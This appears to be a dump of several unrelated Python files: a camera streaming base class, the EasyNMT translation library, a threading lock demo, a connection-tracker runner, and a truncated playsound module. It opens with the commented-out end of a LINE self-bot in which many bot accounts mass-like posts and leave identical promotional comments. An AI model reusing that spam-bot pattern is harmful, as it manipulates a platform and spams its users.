# ki8.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
# ki8.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Re̶y̶Pr̶o̶ᵃˢⁱˢᵗ [∆√ cувєя тк™ √∆]\n\nhttp://line.me/ti/p/~s.k.9.7\n\nRe̶y̶Pr̶o̶ᵃˢⁱˢᵗ\n\nhttp://line.me/ti/p/~s.k.9.7")
# ki9.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
# ki9.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Re̶y̶Pr̶o̶ᵃˢⁱˢᵗ [∆√ cувєя тк™ √∆]\n\nhttp://line.me/ti/p/~s.k.9.7\n\nRe̶y̶Pr̶o̶ᵃˢⁱˢᵗ\n\nhttp://line.me/ti/p/~s.k.9.7")
# ki10.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
# ki10.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Re̶y̶Pr̶o̶ᵃˢⁱˢᵗ [∆√ cувєя тк™ √∆]\n\nhttp://line.me/ti/p/~s.k.9.7\n\nRe̶y̶Pr̶o̶ᵃˢⁱˢᵗ\n\nhttp://line.me/ti/p/~s.k.9.7")
# ki11.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
# ki11.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Re̶y̶Pr̶o̶ᵃˢⁱˢᵗ [∆√ cувєя тк™ √∆]\n\nhttp://line.me/ti/p/~s.k.9.7\n\nRe̶y̶Pr̶o̶ᵃˢⁱˢᵗ\n\nhttp://line.me/ti/p/~s.k.9.7")
# ki12.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
# ki12.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Re̶y̶Pr̶o̶ᵃˢⁱˢᵗ [∆√ cувєя тк™ √∆]\n\nhttp://line.me/ti/p/~s.k.9.7\n\nRe̶y̶Pr̶o̶ᵃˢⁱˢᵗ\n\nhttp://line.me/ti/p/~s.k.9.7")
# ki13.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
# ki13.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Re̶y̶Pr̶o̶ᵃˢⁱˢᵗ [∆√ cувєя тк™ √∆]\n\nhttp://line.me/ti/p/~cybertk\n\nRe̶y̶Pr̶o̶ᵃˢⁱˢᵗ\n\nhttp://line.me/ti/p/~s.k.9.7")
# ki14.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
# ki14.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Re̶y̶Pr̶o̶ᵃˢⁱˢᵗ [∆√ cувєя тк™ √∆]\n\nhttp://line.me/ti/p/~s.k.9.7\n\nRe̶y̶Pr̶o̶ᵃˢⁱˢᵗ\n\nhttp://line.me/ti/p/~s.k.9.7")
# ki15.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
# ki15.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Re̶y̶Pr̶o̶ᵃˢⁱˢᵗ [∆√ cувєя тк™ √∆]\n\nhttp://line.me/ti/p/~s.k.9.7\n\nRe̶y̶Pr̶o̶ᵃˢⁱˢᵗ\n\nhttp://line.me/ti/p/~s.k.9.7")
# ki16.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
# ki16.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Re̶y̶Pr̶o̶ᵃˢⁱˢᵗ [∆√ cувєя тк™ √∆]\n\nhttp://line.me/ti/p/~s.k.9.7\n\nRe̶y̶Pr̶o̶ᵃˢⁱˢᵗ\n\nhttp://line.me/ti/p/~s.k.9.7")
# ki17.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
# ki17.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Re̶y̶Pr̶o̶ᵃˢⁱˢᵗ [∆√ cувєя тк™ √∆]\n\nhttp://line.me/ti/p/~s.k.9.7\n\nRe̶y̶Pr̶o̶ᵃˢⁱˢᵗ\n\nhttp://line.me/ti/p/~s.k.9.7")
# ki18.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
# ki18.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Re̶y̶Pr̶o̶ᵃˢⁱˢᵗ [∆√ cувєя тк™ √∆]\n\nhttp://line.me/ti/p/~s.k.9.7\n\nRe̶y̶Pr̶o̶ᵃˢⁱˢᵗ\n\nhttp://line.me/ti/p/~s.k.9.7")
# ki19.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
# ki19.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Re̶y̶Pr̶o̶ᵃˢⁱˢᵗ [∆√ cувєя тк™ √∆]\n\nhttp://line.me/ti/p/~s.k.9.7\n\nRe̶y̶Pr̶o̶ᵃˢⁱˢᵗ\n\nhttp://line.me/ti/p/~s.k.9.7")
# ki20.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
# ki20.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Re̶y̶Pr̶o̶ᵃˢⁱˢᵗ [∆√ cувєя тк™ √∆]\n\nhttp://line.me/ti/p/~s.k.9.7\n\nRe̶y̶Pr̶o̶ᵃˢⁱˢᵗ\n\nhttp://line.me/ti/p/~s.k.9.7")
# print "Like"
# print "Like"
# print "Like"
# except:
# pass
# else:
# print "Already Liked"
# time.sleep(600)
#thread2 = threading.Thread(target=autolike)
#thread2.daemon = True
#thread2.start()
while True:
try:
Ops = cl.fetchOps(cl.Poll.rev, 5)
except EOFError:
raise Exception("It might be wrong revision\n" + str(cl.Poll.rev))
for Op in Ops:
if (Op.type != OpType.END_OF_OPERATION):
cl.Poll.rev = max(cl.Poll.rev, Op.revision)
bot(Op)
|
base_camera.py | import time
import threading
import os
try:
from greenlet import getcurrent as get_ident
except ImportError:
try:
from thread import get_ident
except ImportError:
from _thread import get_ident
class CameraEvent(object):
"""An Event-like class that signals all active clients when a new frame is
available.
"""
def __init__(self):
self.events = {}
def wait(self):
"""Invoked from each client's thread to wait for the next frame."""
ident = get_ident()
if ident not in self.events:
# this is a new client
# add an entry for it in the self.events dict
# each entry has two elements, a threading.Event() and a timestamp
self.events[ident] = [threading.Event(), time.time()]
return self.events[ident][0].wait()
def set(self):
"""Invoked by the camera thread when a new frame is available."""
now = time.time()
remove = None
for ident, event in self.events.items():
if not event[0].isSet():
# if this client's event is not set, then set it
# also update the last set timestamp to now
event[0].set()
event[1] = now
else:
# if the client's event is already set, it means the client
# did not process a previous frame
# if the event stays set for more than 5 seconds, then assume
# the client is gone and remove it
if now - event[1] > 5:
remove = ident
if remove:
del self.events[remove]
def clear(self):
"""Invoked from each client's thread after a frame was processed."""
self.events[get_ident()][0].clear()
class BaseCamera(object):
thread = None # background thread that reads frames from camera
frame = None # current frame is stored here by background thread
last_access = 0 # time of last client access to the camera
event = CameraEvent()
def __init__(self):
"""Start the background camera thread if it isn't running yet."""
if BaseCamera.thread is None:
BaseCamera.last_access = time.time()
# start background frame thread
BaseCamera.thread = threading.Thread(target=self._thread)
BaseCamera.thread.start()
# wait until frames are available
while self.get_frame() is None:
time.sleep(0)
def get_frame(self):
"""Return the current camera frame."""
BaseCamera.last_access = time.time()
# wait for a signal from the camera thread
BaseCamera.event.wait()
BaseCamera.event.clear()
return BaseCamera.frame
@staticmethod
def frames():
""""Generator that returns frames from the camera."""
raise RuntimeError('Must be implemented by subclasses.')
@classmethod
def _thread(cls):
"""Camera background thread."""
print('Starting camera thread.')
frames_iterator = cls.frames()
for frame in frames_iterator:
BaseCamera.frame = frame
BaseCamera.event.set() # send signal to clients
time.sleep(0)
# if there hasn't been any clients asking for frames in
# the last 10 seconds then stop the thread
if time.time() - BaseCamera.last_access > 10:
frames_iterator.close()
#adding servo pwm stop command: https://github.com/richardghirst/PiBits/tree/master/ServoBlaster
os.system("echo 2=0 > /dev/servoblaster") # 2 is raspberry pi gpio pin # 18
os.system("echo 6=0 > /dev/servoblaster") # 6 is raspberry pi gpio pin # 24
print('Stopping camera thread and servos due to inactivity.')
break
BaseCamera.thread = None
|
EasyNMT.py | import os
import torch
from .util import http_get, import_from_string
import json
from . import __DOWNLOAD_SERVER__
from typing import List, Union, Dict, FrozenSet, Set, Iterable
import numpy as np
import tqdm
import nltk
import torch.multiprocessing as mp
import queue
import math
import re
import logging
import time
logger = logging.getLogger(__name__)
class EasyNMT:
def __init__(self, model_name: str, cache_folder: str = None, translator=None, load_translator: bool = True, device=None, max_length: int = None, **kwargs):
"""
Easy-to-use, state-of-the-art machine translation
:param model_name: Model name (see Readme for available models)
:param cache_folder: Which folder should be used for caching models. Can also be set via the EASYNMT_CACHE env. variable
:param translator: Translator object. Set to None, to automatically load the model via the model name.
:param load_translator: If set to false, it will only load the config but not the translation engine
:param device: CPU / GPU device for PyTorch
:param max_length: Max number of token per sentence for translation. Longer text will be truncated
:param kwargs: Further optional parameters for the different models
"""
self._fasttext_lang_id = None
self._lang_detectors = [self.language_detection_fasttext, self.language_detection_langid, self.language_detection_langdetect]
if device is None:
device = 'cuda' if torch.cuda.is_available() else 'cpu'
self.device = device
self.config = None
if cache_folder is None:
if 'EASYNMT_CACHE' in os.environ:
cache_folder = os.environ['EASYNMT_CACHE']
else:
cache_folder = os.path.join(torch.hub._get_torch_home(), 'easynmt')
self._cache_folder = cache_folder
if translator is not None:
self.translator = translator
else:
if os.path.exists(model_name) and os.path.isdir(model_name):
model_path = model_name
else:
model_name = model_name.lower()
model_path = os.path.join(cache_folder, model_name)
if not os.path.exists(model_path) or not os.listdir(model_path):
logger.info("Downloading EasyNMT model {} and saving it at {}".format(model_name, model_path))
model_path_tmp = model_path.rstrip("/").rstrip("\\") + "_part"
os.makedirs(model_path_tmp, exist_ok=True)
#Download easynmt.json
config_url = __DOWNLOAD_SERVER__+"/{}/easynmt.json".format(model_name)
config_path = os.path.join(model_path_tmp, 'easynmt.json')
http_get(config_url, config_path)
with open(config_path) as fIn:
downloaded_config = json.load(fIn)
if 'files' in downloaded_config:
for filename, url in downloaded_config['files'].items():
logger.info("Download {} from {}".format(filename, url))
http_get(url, os.path.join(model_path_tmp, filename))
##Rename tmp path
os.rename(model_path_tmp, model_path)
with open(os.path.join(model_path, 'easynmt.json')) as fIn:
self.config = json.load(fIn)
self._lang_pairs = frozenset(self.config['lang_pairs'])
if load_translator:
module_class = import_from_string(self.config['model_class'])
self.translator = module_class(model_path, **kwargs)
self.translator.max_length = max_length
def translate(self, documents: Union[str, List[str]], target_lang: str, source_lang: str = None,
show_progress_bar: bool = False, beam_size: int = 5, batch_size: int = 16,
perform_sentence_splitting: bool = True, paragraph_split: str = "\n", sentence_splitter=None, document_language_detection: bool = True,
**kwargs):
"""
This method translates the given set of documents
:param documents: If documents is a string, returns the translated document as string. If documents is a list of strings, translates all documents and returns a list.
:param target_lang: Target language for the translation
:param source_lang: Source language for all documents. If None, determines the source languages automatically.
:param show_progress_bar: If true, plot a progress bar on the progress for the translation
:param beam_size: Size for beam search
:param batch_size: Number of sentences to translate at the same time
:param perform_sentence_splitting: Longer documents are broken down sentences, which are translated individually
:param paragraph_split: Split symbol for paragraphs. No sentences can go across the paragraph_split symbol.
:param sentence_splitter: Method used to split sentences. If None, uses the default self.sentence_splitting method
:param document_language_detection: Perform language detection on document level
:param kwargs: Optional arguments for the translator model
:return: Returns a string or a list of string with the translated documents
"""
#Method_args will store all passed arguments to method
method_args = locals()
del method_args['self']
del method_args['kwargs']
method_args.update(kwargs)
if source_lang == target_lang:
return documents
is_single_doc = False
if isinstance(documents, str):
documents = [documents]
is_single_doc = True
if source_lang is None and document_language_detection:
src_langs = [self.language_detection(doc) for doc in documents]
# Group by languages
lang2id = {}
for idx, lng in enumerate(src_langs):
if lng not in lang2id:
lang2id[lng] = []
lang2id[lng].append(idx)
# Translate language wise
output = [None] * len(documents)
for lng, ids in lang2id.items():
logger.info("Translate documents of language: {}".format(lng))
try:
method_args['documents'] = [documents[idx] for idx in ids]
method_args['source_lang'] = lng
translated = self.translate(**method_args)
for idx, translated_sentences in zip(ids, translated):
output[idx] = translated_sentences
except Exception as e:
logger.warning("Exception: "+str(e))
raise e
if is_single_doc and len(output) == 1:
output = output[0]
return output
if perform_sentence_splitting:
if sentence_splitter is None:
sentence_splitter = self.sentence_splitting
# Split document into sentences
start_time = time.time()
splitted_sentences = []
sent2doc = []
for doc in documents:
paragraphs = doc.split(paragraph_split) if paragraph_split is not None else [doc]
for para in paragraphs:
for sent in sentence_splitter(para.strip(), source_lang):
sent = sent.strip()
if len(sent) > 0:
splitted_sentences.append(sent)
sent2doc.append(len(splitted_sentences))
#logger.info("Sentence splitting done after: {:.2f} sec".format(time.time() - start_time))
#logger.info("Translate {} sentences".format(len(splitted_sentences)))
translated_sentences = self.translate_sentences(splitted_sentences, target_lang=target_lang, source_lang=source_lang, show_progress_bar=show_progress_bar, beam_size=beam_size, batch_size=batch_size, **kwargs)
# Merge sentences back to documents
start_time = time.time()
translated_docs = []
for doc_idx in range(len(documents)):
start_idx = sent2doc[doc_idx - 1] if doc_idx > 0 else 0
end_idx = sent2doc[doc_idx]
translated_docs.append(self._reconstruct_document(documents[doc_idx], splitted_sentences[start_idx:end_idx], translated_sentences[start_idx:end_idx]))
#logger.info("Document reconstruction done after: {:.2f} sec".format(time.time() - start_time))
else:
translated_docs = self.translate_sentences(documents, target_lang=target_lang, source_lang=source_lang, show_progress_bar=show_progress_bar, beam_size=beam_size, batch_size=batch_size, **kwargs)
if is_single_doc:
translated_docs = translated_docs[0]
return translated_docs
@staticmethod
def _reconstruct_document(doc, org_sent, translated_sent):
"""
This method reconstructs the translated document and
keeps white space in the beginning / at the end of sentences.
"""
sent_idx = 0
char_idx = 0
translated_doc = ""
while char_idx < len(doc):
if sent_idx < len(org_sent) and doc[char_idx] == org_sent[sent_idx][0]:
translated_doc += translated_sent[sent_idx]
char_idx += len(org_sent[sent_idx])
sent_idx += 1
else:
translated_doc += doc[char_idx]
char_idx += 1
return translated_doc
def translate_sentences(self, sentences: Union[str, List[str]], target_lang: str, source_lang: str = None,
show_progress_bar: bool = False, beam_size: int = 5, batch_size: int = 32, **kwargs):
"""
This method translates individual sentences.
:param sentences: A single sentence or a list of sentences to be translated
:param source_lang: Source language for all sentences. If none, determines automatically the source language
:param target_lang: Target language for the translation
:param show_progress_bar: Show a progress bar
:param beam_size: Size for beam search
:param batch_size: Mini batch size
:return: List of translated sentences
"""
if source_lang == target_lang:
return sentences
is_single_sentence = False
if isinstance(sentences, str):
sentences = [sentences]
is_single_sentence = True
output = []
if source_lang is None:
#Determine languages for sentences
src_langs = [self.language_detection(sent) for sent in sentences]
logger.info("Detected languages: {}".format(set(src_langs)))
#Group by languages
lang2id = {}
for idx, lng in enumerate(src_langs):
if lng not in lang2id:
lang2id[lng] = []
lang2id[lng].append(idx)
#Translate language wise
output = [None] * len(sentences)
for lng, ids in lang2id.items():
logger.info("Translate sentences of language: {}".format(lng))
try:
grouped_sentences = [sentences[idx] for idx in ids]
translated = self.translate_sentences(grouped_sentences, source_lang=lng, target_lang=target_lang, show_progress_bar=show_progress_bar, beam_size=beam_size, batch_size=batch_size, **kwargs)
for idx, translated_sentences in zip(ids, translated):
output[idx] = translated_sentences
except Exception as e:
logger.warning("Exception: "+str(e))
raise e
else:
#Sort by length to speed up processing
length_sorted_idx = np.argsort([-len(sen) for sen in sentences])
sentences_sorted = [sentences[idx] for idx in length_sorted_idx]
iterator = range(0, len(sentences_sorted), batch_size)
if show_progress_bar:
scale = min(batch_size, len(sentences))
iterator = tqdm.tqdm(iterator, total=len(sentences)/scale, unit_scale=scale, smoothing=0)
for start_idx in iterator:
output.extend(self.translator.translate_sentences(sentences_sorted[start_idx:start_idx+batch_size], source_lang=source_lang, target_lang=target_lang, beam_size=beam_size, device=self.device, **kwargs))
#Restore original sorting of sentences
output = [output[idx] for idx in np.argsort(length_sorted_idx)]
if is_single_sentence:
output = output[0]
return output
def start_multi_process_pool(self, target_devices: List[str] = None):
"""
Starts multi process to process the encoding with several, independent processes.
This method is recommended if you want to encode on multiple GPUs. It is advised
to start only one process per GPU. This method works together with encode_multi_process
:param target_devices: PyTorch target devices, e.g. cuda:0, cuda:1... If None, all available CUDA devices will be used
:return: Returns a dict with the target processes, an input queue and and output queue.
"""
if target_devices is None:
if torch.cuda.is_available():
target_devices = ['cuda:{}'.format(i) for i in range(torch.cuda.device_count())]
else:
logger.info("CUDA is not available. Start 4 CPU worker")
target_devices = ['cpu'] * 4
logger.info("Start multi-process pool on devices: {}".format(', '.join(map(str, target_devices))))
ctx = mp.get_context('spawn')
input_queue = ctx.Queue()
output_queue = ctx.Queue()
processes = []
for cuda_id in target_devices:
p = ctx.Process(target=EasyNMT._encode_multi_process_worker, args=(cuda_id, self, input_queue, output_queue), daemon=True)
p.start()
processes.append(p)
return {'input': input_queue, 'output': output_queue, 'processes': processes}
def translate_multi_process(self, pool: Dict[str, object], documents: List[str], show_progress_bar: bool = True, chunk_size: int = None, **kwargs) -> List[str]:
"""
This method allows to run encode() on multiple GPUs. The sentences are chunked into smaller packages
and sent to individual processes, which encode these on the different GPUs. This method is only suitable
for encoding large sets of sentences
:param pool: A pool of workers started with SentenceTransformer.start_multi_process_pool
:param chunk_size: Sentences are chunked and sent to the individual processes. If none, it determine a sensible size.
"""
if chunk_size is None:
chunk_size = min(math.ceil(len(documents) / len(pool["processes"]) / 10), 1000)
logger.info("Chunk data into packages of size {}".format(chunk_size))
input_queue = pool['input']
last_chunk_id = 0
for start_idx in range(0, len(documents), chunk_size):
input_queue.put([last_chunk_id, documents[start_idx:start_idx+chunk_size], kwargs])
last_chunk_id += 1
output_queue = pool['output']
results_list = sorted([output_queue.get() for _ in tqdm.tqdm(range(last_chunk_id), total=last_chunk_id, unit_scale=chunk_size, smoothing=0, disable=not show_progress_bar)], key=lambda chunk: chunk[0])
translated = []
for chunk in results_list:
translated.extend(chunk[1])
return translated
def translate_stream(self, stream: Iterable[str], show_progress_bar: bool = True, chunk_size: int = 128, **kwargs) -> List[str]:
batch = []
for doc in tqdm.tqdm(stream, smoothing=0.0, disable=not show_progress_bar):
batch.append(doc)
if len(batch) >= chunk_size:
translated = self.translate(batch, show_progress_bar=False, **kwargs)
for trans_doc in translated:
yield trans_doc
batch = []
if len(batch) >= chunk_size:
translated = self.translate(batch, show_progress_bar=False, **kwargs)
for trans_doc in translated:
yield trans_doc
@staticmethod
def stop_multi_process_pool(pool):
"""
Stops all processes started with start_multi_process_pool
"""
for p in pool['processes']:
p.terminate()
for p in pool['processes']:
p.join()
p.close()
pool['input'].close()
pool['output'].close()
@staticmethod
def _encode_multi_process_worker(target_device: str, model, input_queue, results_queue):
"""
Internal working process to encode sentences in multi-process setup
"""
model.device = target_device
while True:
try:
id, documents, kwargs = input_queue.get()
translated = model.translate(documents, **kwargs)
results_queue.put([id, translated])
except queue.Empty:
break
def language_detection(self, text: str) -> str:
"""
Given a text, detects the language code and returns the ISO language code.
It test different language detectors, based on what is available:
fastText, langid, langdetect.
You can change the language detector order by changing model._lang_detectors
:param text: Text for which we want to determine the language
:return: ISO language code
"""
for lang_detector in self._lang_detectors:
try:
return lang_detector(text)
except:
pass
raise Exception("No method for automatic language detection was found. Please install at least one of the following: fasttext (pip install fasttext), langid (pip install langid), or langdetect (pip install langdetect)")
def language_detection_fasttext(self, text: str) -> str:
"""
Given a text, detects the language code and returns the ISO language code. It supports 176 languages. Uses
the fasttext model for language detection:
https://fasttext.cc/blog/2017/10/02/blog-post.html
https://fasttext.cc/docs/en/language-identification.html
"""
if self._fasttext_lang_id is None:
import fasttext
fasttext.FastText.eprint = lambda x: None #Silence useless warning: https://github.com/facebookresearch/fastText/issues/1067
model_path = os.path.join(self._cache_folder, 'lid.176.ftz')
if not os.path.exists(model_path):
http_get('https://dl.fbaipublicfiles.com/fasttext/supervised-models/lid.176.ftz', model_path)
self._fasttext_lang_id = fasttext.load_model(model_path)
return self._fasttext_lang_id.predict(text.lower().replace("\r\n", " ").replace("\n", " ").strip())[0][0].split('__')[-1]
def language_detection_langid(self, text: str) -> str:
import langid
return langid.classify(text.lower().replace("\r\n", " ").replace("\n", " ").strip())[0]
def language_detection_langdetect(self, text: str) -> str:
import langdetect
return langdetect.detect(text.lower().replace("\r\n", " ").replace("\n", " ").strip())
def sentence_splitting(self, text: str, lang: str = None):
if lang == 'th':
from thai_segmenter import sentence_segment
sentences = [str(sent) for sent in sentence_segment(text)]
elif lang in ['ar', 'jp', 'ko', 'zh']:
sentences = list(re.findall(u'[^!?。\.]+[!?。\.]*', text, flags=re.U))
else:
try:
nltk.data.find('tokenizers/punkt')
except LookupError:
nltk.download('punkt')
sentences = nltk.sent_tokenize(text)
return sentences
@property
def lang_pairs(self) -> FrozenSet[str]:
"""
Returns all allowed languages directions for the loaded model
"""
return self._lang_pairs
def get_languages(self, source_lang: str = None, target_lang: str = None) -> List[str]:
"""
Returns all available languages supported by the model
:param source_lang: If not None, then returns all languages to which we can translate for the given source_lang
:param target_lang: If not None, then returns all languages from which we can translate for the given target_lang
:return: Sorted list with the determined languages
"""
langs = set()
for lang_pair in self.lang_pairs:
source, target = lang_pair.split("-")
if source_lang is None and target_lang is None:
langs.add(source)
langs.add(target)
elif target_lang is not None and target == target_lang:
langs.add(source)
elif source_lang is not None and source == source_lang:
langs.add(target)
return sorted(list(langs))
|
do_lock.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import time, threading
# 假定这是你的银行存款:
balance = 0
lock = threading.Lock()
def change_it(n):
# 先存后取,结果应该为0:
global balance
balance = balance + n
balance = balance - n
def run_thread(n):
for i in range(100000):
# 先要获取锁:
lock.acquire()
try:
# 放心地改吧:
change_it(n)
finally:
# 改完了一定要释放锁:
lock.release()
t1 = threading.Thread(target=run_thread, args=(5,))
t2 = threading.Thread(target=run_thread, args=(8,))
t1.start()
t2.start()
t1.join()
t2.join()
print(balance)
|
runner.py | import signal
import time
from threading import Thread
__all__ = ['Runner']
class Runner(object):
def __init__(self, conntracker, syncer, logger, **args):
self._conntracker = conntracker
self._syncer = syncer
self._logger = logger
self._args = args
self._done = False
self._handle_thread = None
self._sub_thread = None
def run(self):
self._start_threads()
try:
signal.signal(signal.SIGUSR1, self._conntracker.dump_state)
self._logger.info('entering sample loop '
'threshold={} top_n={} eval_interval={}'.format(
self._args['conn_threshold'],
self._args['top_n'],
self._args['eval_interval']))
self._run_sample_loop()
except KeyboardInterrupt:
self._logger.warn('interrupt')
finally:
signal.signal(signal.SIGUSR1, signal.SIG_IGN)
self._logger.info('cleaning up')
self._done = True
self._conntracker.sample(self._args['conn_threshold'],
self._args['top_n'])
self._conntracker.cleanup()
self._join()
def _run_sample_loop(self):
while True:
self._conntracker.sample(self._args['conn_threshold'],
self._args['top_n'])
nextloop = time.time() + self._args['eval_interval']
while time.time() < nextloop:
self._join()
if not self._is_alive():
self._done = True
return
if self._is_done():
return
time.sleep(0.1)
def _start_threads(self):
self._handle_thread = Thread(target=self._handle)
self._handle_thread.start()
self._sub_thread = Thread(target=self._sub)
self._sub_thread.daemon = True
self._sub_thread.start()
def _join(self):
self._handle_thread.join(0.1)
def _is_alive(self):
return self._handle_thread.is_alive()
def _is_done(self):
return self._done
def _handle(self):
try:
self._conntracker.handle(
self._args['events'], is_done=self._is_done)
except Exception:
self._logger.exception('breaking out of handle wrap')
finally:
self._done = True
def _sub(self):
try:
self._syncer.sub(is_done=self._is_done)
except Exception:
self._logger.exception('breaking out of sub wrap')
self._done = True
|
playsound.py | import logging
logger = logging.getLogger(__name__)
class PlaysoundException(Exception):
pass
def _canonicalizePath(path):
"""
Support passing in a pathlib.Path-like object by converting to str.
"""
import sys
if sys.version_info[0] >= 3:
return str(path)
else:
# On earlier Python versions, str is a byte string, so attempting to
# convert a unicode string to str will fail. Leave it alone in this case.
return path
def _playsoundWin(sound, block = True):
'''
Utilizes windll.winmm. Tested and known to work with MP3 and WAVE on
Windows 7 with Python 2.7. Probably works with more file formats.
Probably works on Windows XP thru Windows 10. Probably works with all
versions of Python.
Inspired by (but not copied from) Michael Gundlach <gundlach@gmail.com>'s mp3play:
https://github.com/michaelgundlach/mp3play
I never would have tried using windll.winmm without seeing his code.
'''
sound = '"' + _canonicalizePath(sound) + '"'
from ctypes import create_unicode_buffer, windll, wintypes
from time import sleep
windll.winmm.mciSendStringW.argtypes = [wintypes.LPCWSTR, wintypes.LPWSTR, wintypes.UINT, wintypes.HANDLE]
windll.winmm.mciGetErrorStringW.argtypes = [wintypes.DWORD, wintypes.LPWSTR, wintypes.UINT]
def winCommand(*command):
bufLen = 600
buf = create_unicode_buffer(bufLen)
command = ' '.join(command)
errorCode = int(windll.winmm.mciSendStringW(command, buf, bufLen - 1, 0)) # use widestring version of the function
if errorCode:
errorBuffer = create_unicode_buffer(bufLen)
windll.winmm.mciGetErrorStringW(errorCode, errorBuffer, bufLen - 1) # use widestring version of the function
exceptionMessage = ('\n Error ' + str(errorCode) + ' for command:'
'\n ' + command +
'\n ' + errorBuffer.value)
logger.error(exceptionMessage)
raise PlaysoundException(exceptionMessage)
return buf.value
try:
logger.debug('Starting')
winCommand(u'open {}'.format(sound))
winCommand(u'play {}{}'.format(sound, ' wait' if block else ''))
logger.debug('Returning')
finally:
try:
winCommand(u'close {}'.format(sound))
except PlaysoundException:
logger.warning(u'Failed to close the file: {}'.format(sound))
# If it fails, there's nothing more that can be done...
pass
def _handlePathOSX(sound):
sound = _canonicalizePath(sound)
if '://' not in sound:
if not sound.startswith('/'):
from os import getcwd
sound = getcwd() + '/' + sound
sound = 'file://' + sound
try:
# Don't double-encode it.
sound.encode('ascii')
return sound.replace(' ', '%20')
except UnicodeEncodeError:
try:
from urllib.parse import quote # Try the Python 3 import first...
except ImportError:
from urllib import quote # Try using the Python 2 import before giving up entirely...
parts = sound.split('://', 1)
return parts[0] + '://' + quote(parts[1].encode('utf-8')).replace(' ', '%20')
def _playsoundOSX(sound, block = True):
'''
Utilizes AppKit.NSSound. Tested and known to work with MP3 and WAVE on
OS X 10.11 with Python 2.7. Probably works with anything QuickTime supports.
Probably works on OS X 10.5 and newer. Probably works with all versions of
Python.
Inspired by (but not copied from) Aaron's Stack Overflow answer here:
http://stackoverflow.com/a/34568298/901641
I never would have tried using AppKit.NSSound without seeing his code.
'''
try:
from AppKit import NSSound
except ImportError:
logger.warning("playsound could not find a copy of AppKit - falling back to using macOS's system copy.")
sys.path.append('/System/Library/Frameworks/Python.framework/Versions/2.7/Extras/lib/python/PyObjC')
from AppKit import NSSound
from Foundation import NSURL
from time import sleep
sound = _handlePathOSX(sound)
url = NSURL.URLWithString_(sound)
if not url:
raise PlaysoundException('Cannot find a sound with filename: ' + sound)
for i in range(5):
nssound = NSSound.alloc().initWithContentsOfURL_byReference_(url, True)
if nssound:
break
else:
logger.debug('Failed to load sound, although url was good... ' + sound)
else:
raise PlaysoundException('Could not load sound with filename, although URL was good... ' + sound)
nssound.play()
if block:
sleep(nssound.duration())
def _playsoundNix(sound, block = True):
"""Play a sound using GStreamer.
Inspired by this:
https://gstreamer.freedesktop.org/documentation/tutorials/playback/playbin-usage.html
"""
sound = _canonicalizePath(sound)
# pathname2url escapes non-URL-safe characters
from os.path import abspath, exists
try:
from urllib.request import pathname2url
except ImportError:
# python 2
from urllib import pathname2url
import gi
gi.require_version('Gst', '1.0')
from gi.repository import Gst
Gst.init(None)
playbin = Gst.ElementFactory.make('playbin', 'playbin')
if sound.startswith(('http://', 'https://')):
playbin.props.uri = sound
else:
path = abspath(sound)
if not exists(path):
raise PlaysoundException(u'File not found: {}'.format(path))
playbin.props.uri = 'file://' + pathname2url(path)
set_result = playbin.set_state(Gst.State.PLAYING)
if set_result != Gst.StateChangeReturn.ASYNC:
raise PlaysoundException(
"playbin.set_state returned " + repr(set_result))
# FIXME: use some other bus method than poll() with block=False
# https://lazka.github.io/pgi-docs/#Gst-1.0/classes/Bus.html
logger.debug('Starting play')
if block:
bus = playbin.get_bus()
try:
bus.poll(Gst.MessageType.EOS, Gst.CLOCK_TIME_NONE)
finally:
playbin.set_state(Gst.State.NULL)
logger.debug('Finishing play')
def _playsoundAnotherPython(otherPython, sound, block = True, macOS = False):
'''
Mostly written so that when this is run on python3 on macOS, it can invoke
python2 on macOS... but maybe this idea could be useful on linux, too.
'''
from inspect import getsourcefile
from os.path import abspath, exists
from subprocess import check_call
from threading import Thread
